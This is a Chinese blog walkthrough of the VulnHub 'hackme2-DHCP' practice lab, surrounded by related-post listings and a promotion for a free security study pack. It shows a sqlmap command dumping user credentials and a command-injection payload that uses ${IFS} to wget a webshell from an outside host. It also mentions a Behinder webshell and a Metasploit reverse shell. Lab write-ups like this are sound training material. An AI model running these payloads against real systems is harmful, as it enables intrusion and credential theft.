hackDHCP靶场教程

已于 2024-01-20 18:37:23 修改
阅读量35 收藏
点赞数
文章标签: github 网络协议 网络
于 2023-07-22 09:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZL_1618/article/details/131855054
版权

hackDHCP靶场教程

靶场地址:https://download.vulnhub.com/hackme/hackme2-DHCP.ova

img

第一眼就看见了注册,那么这个靶场的思路可能就是注册后的操作,毕竟如果不是,开了这个也没什么用

注册一个用户,然后登陆,登陆成功,翻译了一下是个图书查询的系统

img

img

img

通过页面对比,猜测是个注入

跑了一下

sqlmap -r a.txt -vv --tamper=space2comment --dbms “MySQL” --level 5 -D webapphacking -C “user,pasword” –dump

结果

img

特殊的用户

Superadmin

解密后

img

进来了

img

超级管理员权限

进来的页面有两个点,一个是文件上传,一个是不知道干什么的表单提交,思考如下

制作者考的肯定不是上传点,很明显上传点会难一些,地下更不会放一个无用的表单,挂上XRAY,对功能进行打点,找出容易攻击到的点

Xray扫描入下

img

可以执行PHP代码

尝试复现

img

img

命令执行成功

Wge 下载webshell wget${IFS}http://0.0.0.0//a.php

${IFS}是代替空格的占位符,上线

img

上传脚本到

img

img

img

发现了一个特殊文件

img

切换到交互式,还需要往外弹一下

img

卡壳

最终解决,上传冰蝎马反弹msf 唉,不知道这个靶子为什么nc 用不了

img

img

img

网络安全工程师(白帽子)企业级学习路线

第一阶段:安全基础(入门)

img

第二阶段:Web渗透(初级网安工程师)

img

第三阶段:进阶部分(中级网络安全工程师)

img

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

学习资源分享

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3pPUKfN8-1689928133268)(C:\Users\Administrator\Desktop\网络安全资料图\微信截图_20230201105953.png)]

享!](https://mp.weixin.qq.com/s/BWb9OzaB-gVGVpkm161PMw)

学习资源分享

[外链图片转存中…(img-3pPUKfN8-1689928133268)]

程序员--青青
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【hack靶场学习】——access数据库注入
weixin_42090431的博客
05-17 438
那么在实际场景中,只需要先找到注入点,通过order by进行字段判断,再使用可控输入对目标数据库进行联合注入即可,本质上和MySQL的联合注入差不多,不过它没有information_schema库,需要猜解它的表名和列名,如果猜对了就会在网页上回显账号密码。SQL注入是非常常见的一个漏洞,如果程序员在编写网站源码时未对SQL执行语句作防护措施,那么用户输入就可以执行SQL语句,导致用户数据被删改、拖库、挂马等。1、判断注入点,一般来说单引号、减号、and等就可以判断是否存在注入。
渗透测试练习靶场hackthebox——Starting Point Pathfinder攻略(详细版本)
weixin_42109829的博客
09-08 4708
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
xss hack学习靶场 writeup
dianmangji9200的博客
08-12 631
靶场链接http://xss.tesla-space.com/?tdsourcetag=s_pcqq_aiomsg 参考博客https://blog.csdn.net/xlsj228/article/details/93166486 1 可以看到url中的test参数出现在页面中,虽然f12看到了下一关的地址,我假装没看见 在url处构造payload:xss.tesla-space....
30个Hack实操真实案例,渗透人员必备!
weixin_60428659的博客
08-04 628
HackTheBox 是目前比较新颖的 CTF 实验平台,所有实验基于真实案例所构建。不同于以往的CTF,HackTheBox 注重的是实战,渗透技巧也偏向实战,因此HTB是一个很好的学习渗透测试靶场。 免费学习30个Hack实操过程,每个实验均包括:实验介绍、使用工具、信息搜集、实操演示、总结回顾。通过真实案例,帮您理解渗透思路。免费截止到8月10日 如感兴趣可添加微信号:anqniukt咨询~ ...
pikachu靶场全通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
web渗透教程1:pikachu靶场搭建
11-17
带你手把手搭建pikachu靶场环境
kali2021.3安装dvwa靶场
02-24
描述中提到,这个教程是为刚接触Kali的爱好者准备的,帮助他们了解如何在Kali系统中设置DVWA。 在安装过程中,首先要在物理机上下载DVWA的文件,并进行解压。解压后,需要将文件夹重命名为“dvwa”,以便后续操作。...
开源靶场zsbdzsbd
04-19
开源靶场zsbdzsbd
uploadlabs靶场文件
02-27
搭建在phpstudy/www 目录下解压后把名字改成upload-labs,部署lamp后可直接从127.0.0.1中打开
关于HackMyMV靶场的靶机网络配置与下载
weixin_58368471的博客
06-10 848
BOX的适配问题
[网络安全自学篇] 三十七.Web渗透提高班之hack the box在线靶场注册及入门知识
热门推荐
杨秀璋的专栏
01-09 2万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,而且用户注册该网站时需要绕过关卡并获取邀请码,涉及审查元素、base64解密、发送post请求等操作,挺有意思的。这是一篇基础性文章,将讲述注册过程、遇到的难点及入门案例,希望对您有所帮助。
在线post请求_三十七,Web渗透提高班之hack the box在线靶场注册及入门知识
weixin_39601194的博客
11-30 921
一.注册hack the boxHack The Box是一个在线平台,允许测试您的渗透技能和代码,并与其他类似兴趣的成员交流想法和方法。它包含一些不断更新的挑战,并且模拟真实场景,其风格更倾向于CTF挑战。注册登录之后如下图所示,包括地图炮(attack maps)、在线人数及设备、Web渗透真实场景等。官方网址:https://www.hackthebox.eu/那么,开始我们的注册和学习吧!...
渗透测试练习靶场hackthebox_Oopsie
qq_45951598的博客
03-31 1972
文章目录扫描路径泄露登录升级shell权限提升后续总结 扫描 根据给出的IP地址,使用nmap进行扫描 nmap -sS -F -sV 10.10.10.28 -sS:半开扫描,Nmap发送SYN包到远程主机,不建立完整的三次握手 -F:快速扫描,扫描一些常用端口 -sV:探测开启的端口来获取服务、版本信息 如图所示,发现其开放了22和80端口,接下来我们用浏览器进入网站(10.10.10.28:80)进行检查 路径泄露 方法一 这里他说要登入,但是我们这里不知道登入口在哪 发现可以登录,但是目前没有
如何加速GitHub Clone或文件下载
最新发布
Where there is life, there is hope.
06-23 753
在国内访问GitHub时,下载速度常常会受到网络限制。为了更快地下载GitHub上的文件,我们可以使用一些第三方加速服务、国内云存储服务以及下载工具。下面我将以下载 `Sourcetrail_2021_4_19_Windows_64bit_Portable.zip` 文件为例,详细介绍几种加速下载的方法。
Github 2024-06-20 开源项目日报 Top10
老孙正经胡说
06-20 653
创建周期:354 天开发语言:TypeScript, JavaScript协议类型:MIT LicenseStar数量:7277 个Fork数量:1269 次关注人数:7277 人贡献人数:75 人Open Issues数量:61 个Github地址:https://github.com/danny-avila/LibreChat.git项目首页: https://docs.librechat.ai/
TCP/UDP协议传输
qq_42129915的博客
06-19 358
【代码】TCP/UDP协议传输。
Github 2024-06-22 开源项目日报 Top10
老孙正经胡说
06-22 636
创建周期:354 天开发语言:TypeScript, JavaScript协议类型:MIT LicenseStar数量:7277 个Fork数量:1269 次关注人数:7277 人贡献人数:75 人Open Issues数量:61 个Github地址:https://github.com/danny-avila/LibreChat.git项目首页: https://docs.librechat.ai/
docker靶场教程
08-19
根据您提供的引用内容,以下是Docker靶场教程的步骤: 1. 启动靶场:使用命令docker-compose build和docker-compose up -d来启动靶场。<span class="em">1</span><span class="em">2</span><span class="em">3 ####...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值